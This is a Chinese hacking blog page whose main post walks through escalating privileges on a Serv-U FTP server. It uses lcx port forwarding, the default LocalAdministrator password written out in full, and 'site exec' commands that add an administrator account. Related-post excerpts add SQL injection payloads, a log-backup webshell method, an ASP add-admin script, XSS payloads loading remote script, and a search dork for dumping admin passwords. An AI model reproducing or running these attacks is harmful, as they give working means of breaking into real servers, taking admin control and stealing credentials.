serv-u端口转发提权 -寒龙网出品

1、在服务器上cmd 执行: lcx -slave 我的IP 5000 127.0.0.1 43958(有可能被改)

2、 在本机运行 lcx -listen 5000 21 (lcx地址要写对)

3、 打开本地的serv u 在IP上填入127.0.0.1 帐号:LocalAdministrator 密码:#[email protected]$ak#.lk;[email protected]
(密码帐号有可能改 自己下文件看密码)

此时的链接过程是本机连接21端口----转发往本机5000端口-----管道连接至远程机5000端口------转发至远程43958端口

连接成功后,在本机登录的serv-u相当于远程的serv-u

可以ftp本机IP 输入上面的帐号 密码 在远程ftp服务器执行命令

quote site exec net user vini5 sitedir /add

quote site exec net localgroup administrators vini5 /add


时间: 2024-08-02 18:27:31

serv-u端口转发提权 -寒龙网出品的相关文章

DBO权限日志备份专用一句话木马 - 寒龙网出品 以前的博客站因为程序错乱改为反病毒联盟后 本博客基于博客园地 感谢关注

备分专用一句话 加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小. 日志备分WEBSHELL标准的七步: 1.InjectionURL';alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式) 2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表) 3.InjectionURL';backup lo

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库 /**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[

ASP代码添加超级用户 -寒龙网出品

在user权限下成功添加Administrators组的用户反正代码是对的,但是很少能成功,具体的看运气了.. <head>.network对象脚本权限提升漏洞利用工具</head><form action="useradd.asp" method=post>用户:<input name="username" type="text" value="kevin1986"><b

Xss宽展教程攻击详列 -中国寒龙网出品 欢迎关注

1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javascript:alert('XSS')>(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:ale

关于手机dsploit的安装和使用,关于busybox的安装和手机如何toot..寒龙教程出品

近期本博客更新一款手机流行的渗透工具,那么也会教大家如何进行安装和渗透?.....} 首先介绍一下:dSploit是什么?dSploit是Android系统下的网络分析和渗透套件,其目的是面向IT安全专家和爱好者提供最完整.最先进的专业工具包 ,以便在移动设备上进行网络安全评估.使用条件:Android 2.3 或 2.3 以上.设备已经ROOT. 其次进行手机root  具体下载可以链接我们的云盘:链接:http://pan.baidu.com/s/1mg9iP4W 以下为文字教程:首先安装工

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史,特点,基本结构,函数printf()和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org  感谢朋友们的支持!

0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟

这里公布一个关于aspx网站程序的oday方法很简单.直接爆出管理密码. 也是利用注入漏洞. 利用代码 谷歌搜索关键字:inurl:scoreindex.aspx cart.aspx?act=buy&id=1 and (SelectTop1char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql

web提权笔记

[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com